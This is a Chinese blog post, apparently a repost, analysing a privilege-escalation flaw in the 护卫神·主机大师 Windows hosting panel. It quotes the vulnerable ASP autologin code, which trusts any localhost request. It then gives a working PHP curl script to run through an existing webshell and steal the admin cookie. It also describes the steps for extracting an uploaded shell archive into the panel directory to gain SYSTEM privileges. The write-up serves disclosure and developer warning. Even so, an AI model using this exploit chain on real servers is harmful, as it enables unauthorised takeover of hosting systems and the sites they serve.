护卫神mysql提权_护卫神主机大师被提权漏洞利用(可千万不能乱装护卫神主机管理一键安装的软件)...

本文详细分析了护卫神·主机大师的一个安全漏洞,该漏洞允许攻击者通过特定的asp脚本获取管理员cookie,从而绕过登录限制进入虚拟主机管理后台,并可能进一步提权至system权限。提醒开发者注意内部安全,避免过度信任。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

“护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神14年安全防护经验,严格限制每个站点独立权限,彻底阻挡跨站入侵。”

这话说的有点绝对性,做安全是没有绝对的安全的,如果哪家做安全的敢那样说,绝对不会出问题那肯定是在对客户的不负责任。安全是相对的,需要知己知彼 双方的配合以及安全的不断完善化才能把安全做道最大化的保障。

先看看装好后的软件界面,可以看到一些常见的主机操作功能。其中网站管理引起了我的注意,点开瞅瞅

b6ec6bdf16842b9df7be6e4286014988.png

点开之后就直接进去了,WTF?

0f799e4879450ec2754c1b5f348d9119.png

从逻辑流程来看这里很明显有问题,撸开代码看看怎么验证的。虚拟主机管理系统运行在6588端口。且采用asp语言开发。程序路径为x:\HwsHostMaster\host\web\下,且默认为system权限运行。

/admin/index.asp

Dim strIp

strIp = Request.ServerVariables("local_addr")

Dim strAuto

strAuto = LCase(Trim(Request.QueryString("f")))

If (strIp = "::1" Or strIp = "127.0.0.1") And strAuto = "autologin" Then

'获取管理用户登录

Dim sql,rs

call conn_open()

Set rs = Server.CreateObject("Adodb.Recordset")

sql = "select top 1 * from [huweishen_Admin]"

rs.Open sql,conn,1,1

if rs.RecordCount = 0 then

Session("admin")= "autologin"

else

Session("admin") = rs("username")

end if

rs.Close

Session.Timeout =600

AddLog Session("admin"), 1, "控制台直接登录管理中心"

Response.Redirect "index.asp"

End If

%>

代码乍一看好像没啥问题,但是开发者疏忽了一个问题,第9行判断来源ip是否为本地访问,strIp变量来自Request.ServerVariables(“local_addr”) ,如果为本地访问且strAuto=autologin则直接登入系统,无需账号密码验证,这就出现一个问题了,开发者未考虑内部用户是否合法,如果我获取到一个低权限的webshell、那就相当于获取到一个本地身份了。那么我就可以直接访问到虚拟主机管理后台了。那么就可以为所欲为了。

本漏洞利用前提是已经获取到虚拟主机上的一个webshell,其次在通过以下脚本获取cookie即可进入虚拟主机管理后台。

function httpGet() {

$url = '[http://127.0.0.1:6588/admin/index.asp?f=autologin](http://127.0.0.1:6588/admin/index.asp?f=autologin)';

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header

curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body

curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_TIMEOUT, 120);

$result = curl_exec($ch);

return $result;

}

echo httpGet();

?>

将该脚本上传至服务器,访问后即可获取到管理员cookie。在本地修改cookie后即可进入到虚拟主机管理后台。绕过登录限制。

直接访问需要登录

00755aea11be3fedc58896660c6421ad.png

通过脚本获取cookie

fdd9557942734deb4f4797b59adadf36.png

修改cookie后直接访问/admin/index.asp,进入后台

8accb98e772f044c0643ec5abefd8315.png

进入后台后点击网站列表,随便选择一个网站,点击解压进入操作界面,通过FTP或其他方式上传shell压缩包,然后输入文件名和解压路径,解压路径选择护卫神管理系统路径,一般为X:\HwsHostMaster\host\web\ X为任意盘符。

7bb77ba778ca3fc6d51296fdeda5b664.png

在我这里普通网站目录和护卫神管理系统都在D盘下,所以采用相对路径指向到虚拟主机管理系统web路径即可点击解压以后,shell就躺在管理系统目录下了。并且为system权限。成功获取到高权身份

该漏洞利用场景较为鸡肋,前提要求已经获取到该主机上的shell,才可采用该方法进行提权。开发者在开发过程中不要对内部不要过于信任,因为你也无法确保内部绝对的安全。

专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改

网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值